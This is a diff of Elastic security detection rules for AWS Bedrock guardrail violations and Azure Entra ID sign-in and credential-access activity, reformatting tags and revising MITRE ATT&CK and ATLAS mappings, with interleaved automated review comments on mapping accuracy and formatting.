@@ -68,7 +68,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "low" -tags = ["Domain: LLM", "Tactic: Defense Evasion", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", +] timestamp_override = "event.ingested" type = "esql" @@ -108,15 +116,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_violations_total_unique_requests_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0015" -name = "Evade AI Model" -reference = "https://atlas.mitre.org/techniques/AML.T0015/" - -[rule.threat.tactic] -id = "AML.TA0007" -name = "Defense Evasion" -reference = "https://atlas.mitre.org/tactics/AML.TA0007/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml index e69765cf766..f2706780c70 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_high_confidence_misconduct_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/05" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] 
@@ -67,7 +67,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Execution", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -112,15 +120,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_violation_total_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0051" -name = "LLM Prompt Injection" -reference = "https://atlas.mitre.org/techniques/AML.T0051/" - -[rule.threat.tactic] -id = "AML.TA0005" -name = "Execution" -reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml index f8addb7be34..6a2358b50ba 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_high_resource_consumption_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/04" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] 
@@ -66,7 +66,16 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Exfiltration", "Tactic: Impact", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Potential Overload", "Use Case: Resource Exhaustion", "Mitre Atlas: LLM04", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Potential Overload", + "Use Case: Resource Exhaustion", + "Mitre Atlas: LLM04", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
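Review bot: `"Mitre Atlas: LLM04"` survives in the rewritten `tags` array, but `LLM04` is not an ATLAS identifier — ATLAS techniques are `AML.T…`, as the mapping removed in the next hunk (`AML.T0040`, `AML.T0024`, `AML.T0046`) shows — and it reads like an OWASP LLM Top 10 item filed under the wrong prefix. Since this hunk already rewrites the array, correct the prefix or replace the tag with the relevant `AML.T…` IDs here rather than leaving a value that any tooling keyed on `Mitre Atlas:` will mis-classify. The `type = "esql"` context after the hunk is unchanged.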
@@ -106,72 +115,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_risk_score desc ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" - -[[rule.threat.technique.subtechnique]] -id = "T1499.003" -name = "Application Exhaustion Flood" -reference = "https://attack.mitre.org/techniques/T1499/003/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0024" -name = "Exfiltration via AI Inference API" -reference = "https://atlas.mitre.org/techniques/AML.T0024/" - -[rule.threat.tactic] -id = "AML.TA0010" -name = "Exfiltration" -reference = "https://atlas.mitre.org/tactics/AML.TA0010/" - -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0046" -name = "Spamming AI System with Chaff Data" -reference = "https://atlas.mitre.org/techniques/AML.T0046/" - -[rule.threat.tactic] -id = "AML.TA0011" -name = "Impact" -reference = "https://atlas.mitre.org/tactics/AML.TA0011/" 
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml index bb89d860f1b..ac6eb38eb16 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_attempts_to_use_denied_models_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/25" [rule] author = ["Elastic"] @@ -64,7 +64,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "high" -tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Policy Violation", + "Mitre Atlas: T0015", + "Mitre Atlas: T0034", +] timestamp_override = "event.ingested" type = "esql" @@ -101,15 +109,3 @@ from logs-aws_bedrock.invocation-* [rule.investigation_fields] field_names = ["user.id", "cloud.account.id", "gen_ai.request.model.id", "total_denials"] -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" 
diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml index b5824163b1e..2e665685b4f 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_sensitive_information_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -98,15 +106,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_sensitive_info_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0089" -name = "Process Discovery" -reference = "https://atlas.mitre.org/techniques/AML.T0089/" - -[rule.threat.tactic] -id = "AML.TA0008" -name = "Discovery" -reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml index c2a53901fee..c98ff4ef1f5 100644 
--- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_topic_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -98,15 +106,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_topic_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0069" -name = "Discover LLM System Information" -reference = "https://atlas.mitre.org/techniques/AML.T0069/" - -[rule.threat.tactic] -id = "AML.TA0008" -name = "Discovery" -reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml index 19935aec2b5..360900d81b5 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/16" [rule] author = ["Elastic"] @@ -67,7 +67,17 @@ This rule requires that AWS Bedrock Integration be configured. For more informat https://www.elastic.co/docs/current/integrations/aws_bedrock """ severity = "high" -tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034", "Mitre Atlas: T0046", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0015", + "Mitre Atlas: T0034", + "Mitre Atlas: T0046", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -105,15 +115,3 @@ from logs-aws_bedrock.invocation-* [rule.investigation_fields] field_names = ["target_time_window", "user.id", "cloud.account.id", "total_denials"] -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml index 3410cb1a594..e59b0217bfd 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] 
@@ -66,7 +66,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor
 https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html
 """
 severity = "medium"
-tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"]
+tags = [
+ "Domain: LLM",
+ "Data Source: AWS Bedrock",
+ "Data Source: AWS S3",
+ "Use Case: Policy Violation",
+ "Mitre Atlas: T0051",
+ "Mitre Atlas: T0054",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -98,20 +106,3 @@ from logs-aws_bedrock.invocation-*
 | sort Esql.ml_policy_blocked_profanity_count desc
 '''
-[[rule.threat]]
-framework = "MITRE ATLAS"
-
-[[rule.threat.technique]]
-id = "AML.T0084"
-name = "Discover AI Agent Configuration"
-reference = "https://atlas.mitre.org/techniques/AML.T0084/"
-
-[[rule.threat.technique]]
-id = "AML.T0089"
-name = "Process Discovery"
-reference = "https://atlas.mitre.org/techniques/AML.T0089/"
-
-[rule.threat.tactic]
-id = "AML.TA0008"
-name = "Discovery"
-reference = "https://atlas.mitre.org/tactics/AML.TA0008/"
diff --git a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml
index 93c5d59841a..aa6c1fdbe9e 100644
--- a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml
+++ b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/05/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/12"
 [rule]
 author = ["Elastic"]
@@ -119,21 +119,16 @@ event.dataset:azure.signinlogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1213"
 name = "Data from Information Repositories"
 reference = "https://attack.mitre.org/techniques/T1213/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1213.002"
 name = "Sharepoint"
 reference = "https://attack.mitre.org/techniques/T1213/002/"
-[[rule.threat.technique]]
-id = "T1530"
-name = "Data from Cloud Storage"
-reference = "https://attack.mitre.org/techniques/T1530/"
+
 [rule.threat.tactic]
 id = "TA0009"
@@ -142,21 +137,17 @@ reference = "https://attack.mitre.org/tactics/TA0009/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.signinlogs.properties.app_id", "azure.signinlogs.properties.tenant_id"]
diff --git a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml
index 6c94f0ef0c2..3f48cab4cf9 100644
--- a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml
+++ b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/05/06"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 [rule]
 author = ["Elastic"]
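Review bot: The Initial Access entry in `@@ -142,21 +137,17 @@` now maps this rule to `T1566` Phishing in place of `T1078.004` Cloud Accounts, yet the `[rule.new_terms]` context at the end of the hunk shows the rule keys on `azure.signinlogs` `app_id`/`tenant_id` new terms, which evidences an unfamiliar application using an account rather than a phishing delivery. Unless the description (outside this hunk) ties the unusual application to a consent or lure flow, `T1566` with no sub-technique looks like a weaker fit than what it replaces; please confirm the intent. The Collection entry in the first hunk (`T1213.002` Sharepoint) still matches the rule name.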
@@ -101,21 +101,17 @@ event.dataset:azure.graphactivitylogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1114"
 name = "Email Collection"
 reference = "https://attack.mitre.org/techniques/T1114/"
-[[rule.threat.technique.subtechnique]]
-id = "T1114.002"
-name = "Remote Email Collection"
-reference = "https://attack.mitre.org/techniques/T1114/002/"
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = [
diff --git a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml
index 07c41f830ef..a94c27b574e 100644
--- a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml
+++ b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/02"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/21"
 [rule]
 author = ["Elastic"]
@@ -110,13 +110,30 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+[[rule.threat.technique.subtechnique]]
+id = "T1566.002"
+name = "Spearphishing Link"
+reference = "https://attack.mitre.org/techniques/T1566/002/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml
index 3e8f36dcffc..275eddfe849 100644
--- a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml
+++ b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/09/23"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/23"
 [rule]
 author = ["Elastic"]
@@ -96,13 +96,34 @@ value = "now-7d"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
+id = "T1555"
+name = "Credentials from Password Stores"
+reference = "https://attack.mitre.org/techniques/T1555/"
+[[rule.threat.technique.subtechnique]]
+id = "T1555.006"
+name = "Cloud Secrets Management Stores"
+reference = "https://attack.mitre.org/techniques/T1555/006/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
\ No newline at end of file
diff --git a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml
index 1bbd401d0e9..a0016af7ce5 100644
--- a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml
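Review bot: The new end of `credential_access_azure_storage_account_keys_accessed.toml` has no trailing newline (`\ No newline at end of file` after `+reference = "https://attack.mitre.org/tactics/TA0001/"`), unlike every other rule file in this chunk, which ends on a `+` blank line; a final newline should be added so editors and formatters stop reporting the file. Separately, the new `T1555.006` Cloud Secrets Management Stores sub-technique for a storage-account key listing is debatable, since storage account keys are service credentials rather than entries in a secrets manager; the parent `T1555` alone, or the `T1078.004` entry added below, may describe the event more precisely.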
+++ b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases."
 min_stack_version = "9.1.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/12"
 [rule]
 author = ["Elastic"]
@@ -107,21 +107,32 @@ event.dataset: "azure.signinlogs" and event.category: "authentication"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1110.001"
 name = "Password Guessing"
 reference = "https://attack.mitre.org/techniques/T1110/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.003"
+name = "Password Spraying"
+reference = "https://attack.mitre.org/techniques/T1110/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1110.004"
+name = "Credential Stuffing"
+reference = "https://attack.mitre.org/techniques/T1110/004/"
+
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.threshold]
 field = []
 value = 30
diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml
index bf8c794d9eb..b1e86ae2c14 100644
--- a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml
+++ b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/28"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
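Review bot: The blank-line layout of the rewritten threat block in `@@ -107,21 +107,32 @@` is irregular: the blank lines after `framework = "MITRE ATT&CK"` and after the `T1110` technique are removed, while three consecutive `+` blank lines are inserted before `[rule.threat.tactic]` and another after its `reference`. TOML does not care, but this diverges from the one-blank-line-between-tables layout the untouched parts of the file use and reads as generated rather than edited, which makes the real mapping changes harder to spot in review. A normalising pass (one blank line between tables, no doubled or trailing blanks) before merge would help. The same applies to the other threat hunks in this chunk, for example in `credential_access_azure_entra_susp_device_code_signin`, `credential_access_azure_storage_account_keys_accessed`, `discovery_entra_id_teamfiltration_user_agents_detected` and `discovery_storage_blob_container_access_modification`.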
@@ -54,7 +54,17 @@ setup = """#### Required Azure Entra Sign-In Logs
 This rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.
 """
 severity = "high"
-tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: SaaS",
+ "Data Source: Azure",
+ "Data Source: Entra ID",
+ "Data Source: Entra ID Sign-in",
+ "Use Case: Identity and Access Audit",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -125,31 +135,30 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
 [[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
+id = "T1566.002"
+name = "Spearphishing Link"
+reference = "https://attack.mitre.org/techniques/T1566/002/"
+
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml
index b4936e24a57..a4e8626eee9 100644
--- a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml
+++ b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/11"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
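Review bot: After `@@ -125,31 +135,30 @@` this rule's `rule.threat` lists two tactics, Credential Access (`TA0006`) and the new Initial Access (`TA0001`), but the tags hunk just above (`@@ -54,7 +54,17 @@`) leaves only `"Tactic: Credential Access"` — `"Tactic: Defense Evasion"` was dropped without `"Tactic: Initial Access"` taking its place. If the test suite expects one `Tactic:` tag per tactic in `rule.threat`, this will be flagged; if not, the tag list now under-reports the mapping. The same tag/threat gap appears in `credential_access_storage_account_key_regenerated` (tag Credential Access only, threat also Persistence), `discovery_entra_id_teamfiltration_user_agents_detected` (tag Discovery only, threat also Credential Access) and `discovery_storage_blob_container_access_modification` (tag Discovery only, threat also Defense Evasion and Exfiltration).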
@@ -161,13 +161,19 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.001"
+name = "Password Guessing"
+reference = "https://attack.mitre.org/techniques/T1110/001/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
index 4b240b4a0cf..b1b7021a706 100644
--- a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
+++ b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -70,7 +70,18 @@ To ensure this rule functions correctly, the following diagnostic logs must be e
 - AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration.
 """
 severity = "medium"
-tags = ["Domain: Cloud", "Domain: Storage", "Domain: Identity", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Key Vault", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Storage",
+ "Domain: Identity",
